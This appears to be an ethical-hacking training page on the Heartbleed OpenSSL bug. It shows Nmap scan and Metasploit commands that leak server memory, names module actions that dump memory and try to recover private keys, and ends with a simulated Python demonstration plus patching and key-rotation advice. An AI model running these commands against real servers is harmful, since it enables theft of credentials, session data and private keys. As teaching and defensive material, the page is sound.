TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.
Heartbleed (CVE-2014-0160) is a bug in the TLS heartbeat extension handling of OpenSSL 1.0.1 through 1.0.1f. It affected so many systems that it sent waves through the IT industry.
Heartbleed is very simple to exploit and can be very damaging: an unauthenticated client can read up to 64 KB of the server process's memory per request, and the request typically leaves nothing in the server's application logs.
The easiest way to find vulnerable systems is with Nmap, whose ssl-heartbleed NSE script sends a malformed heartbeat request and checks whether the reply carries more data than was sent. Run the following command on your Linux system (port 443 is shown; add any other TLS ports the target uses, such as 993, 995 or 8443):
# nmap -p 443 --script ssl-heartbleed <target(s)>
PORT STATE SERVICE
443/tcp open https
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
As you can see, this has found a vulnerable system.
Next, to exploit this, launch Metasploit with msfconsole. Remember to start the database service first:
# service postgresql start
Once launched, use the following commands to use the Heartbleed module:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > set VERBOSE TRUE
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.1.1
msf auxiliary(openssl_heartbleed) > run
Sending Client Hello...
Heartbeat response, checking if there is data leaked...
Heartbeat response with leak
Printable info leaked:
@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
You will notice here that Metasploit communicated with the server and pulled data out of the server's process memory. The important thing to note is that the data is effectively random: the heartbeat request lies about how long its payload is, and an unpatched OpenSSL copies that many bytes (up to 64 KB) from the heap next to the request buffer straight back into the response, so what you get depends on what the process happened to have in that memory at that moment. There is no guarantee that you will find account credentials, session cookie data or other critical data on any single run; the danger is that, repeated enough times, it can return exactly that. The module offers more than the default SCAN action: set ACTION DUMP stores the raw leaked memory as loot for offline inspection, and set ACTION KEYS attempts to recover the server's RSA private key from the leaked data. On the defensive side, a vulnerable host needs OpenSSL 1.0.1g or later (or a distribution build with the fix backported), a restart of every service that loaded the old library, and, because the private key may already have been read, new keys and certificates, revocation of the old ones, and invalidation of existing sessions and passwords.
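To make concrete why the leaked data is arbitrary, here is an added example that is not part of this page and not the Nmap or Metasploit code. It builds the same kind of malformed heartbeat record the scanners send, runs it against a simulated vulnerable server (the unchecked copy of OpenSSL 1.0.1f) and a simulated patched one (the length check added in 1.0.1g), and applies the scanners' test: a response carrying more payload than was sent means memory was leaked. SAMPLE_HEAP, vulnerable_server and patched_server are constructed stand-ins for real heap contents and real OpenSSL; no network connection is made.

```python
import re
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for the heartbeat extension (RFC 6520)
TLS_VERSION = b"\x03\x02"     # TLS 1.1 record version, as the Nmap script sends
HB_REQUEST, HB_RESPONSE = 1, 2
HB_PADDING = 16               # RFC 6520 requires at least 16 bytes of padding

# Constructed sample of what might sit next to the request on the heap:
# stale bytes from an earlier HTTPS request handled by the same process.
SAMPLE_HEAP = (
    b"\x00\x00\x1f\x8b\x9a\x12"
    + b"Cookie: PHPSESSID=3f2a9c0d; User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    + b"\x00" * 64
)


def build_heartbeat_request(claimed_len, payload=b""):
    """Build a TLS heartbeat record. The record-layer length is honest; the
    HeartbeatMessage.payload_length inside it is what the attacker inflates."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * HB_PADDING
    return struct.pack("!B2sH", TLS_HEARTBEAT, TLS_VERSION, len(body)) + body


def _parse_record(record):
    ctype, version, rec_len = struct.unpack("!B2sH", record[:5])
    assert ctype == TLS_HEARTBEAT
    body = record[5:5 + rec_len]
    hbtype, payload_len = struct.unpack("!BH", body[:3])
    return version, body, hbtype, payload_len


def _heartbeat_reply(version, copied):
    body = struct.pack("!BH", HB_RESPONSE, len(copied)) + copied + b"\x00" * HB_PADDING
    return struct.pack("!B2sH", TLS_HEARTBEAT, version, len(body)) + body


def vulnerable_server(record, heap_after_request):
    """Stand-in for OpenSSL 1.0.1 through 1.0.1f: payload_length is trusted,
    so the copy runs past the request into whatever follows it on the heap.
    The heap is modelled as a byte string; a real process just keeps reading."""
    version, body, _hbtype, payload_len = _parse_record(record)
    memory = body[3:] + heap_after_request   # request payload+padding, then adjacent heap
    copied = memory[:payload_len]            # no bounds check at all
    return _heartbeat_reply(version, copied)


def patched_server(record, heap_after_request):
    """Stand-in for the 1.0.1g fix: a heartbeat whose claimed payload does not
    fit inside the record is silently discarded; otherwise the payload is echoed."""
    version, body, _hbtype, payload_len = _parse_record(record)
    if len(body) < 1 + 2 + HB_PADDING:
        return None
    if 1 + 2 + payload_len + HB_PADDING > len(body):
        return None                          # silently discard, per RFC 6520 section 4
    copied = body[3:3 + payload_len]
    return _heartbeat_reply(version, copied)


def leaked_bytes(request, response):
    """The check the scanners apply: any response payload beyond what we
    actually sent is memory the server should never have copied."""
    if response is None:
        return b""
    _, req_body, _, _ = _parse_record(request)
    sent_payload = req_body[3:-HB_PADDING]
    _, resp_body, hbtype, payload_len = _parse_record(response)
    assert hbtype == HB_RESPONSE
    resp_payload = resp_body[3:3 + payload_len]
    return resp_payload[len(sent_payload):]


def printable_runs(data, min_len=4):
    """Extract printable ASCII runs, the same idea as 'Printable info leaked'."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)


if __name__ == "__main__":
    request = build_heartbeat_request(0x4000)   # claim 16 KiB, send no payload
    for name, server in (("1.0.1f", vulnerable_server), ("1.0.1g", patched_server)):
        leak = leaked_bytes(request, server(request, SAMPLE_HEAP))
        print(name, "leaked", len(leak), "bytes:", printable_runs(leak))
```

The vulnerable stand-in returns the cookie and User-Agent because they happened to be next in SAMPLE_HEAP; change SAMPLE_HEAP and the leak changes with it, which is the whole point of the "random data" warning above. The patched stand-in answers honest heartbeats normally and drops the inflated one without a reply, which is also why a silent timeout rather than an error is the usual sign of a fixed server.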
Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).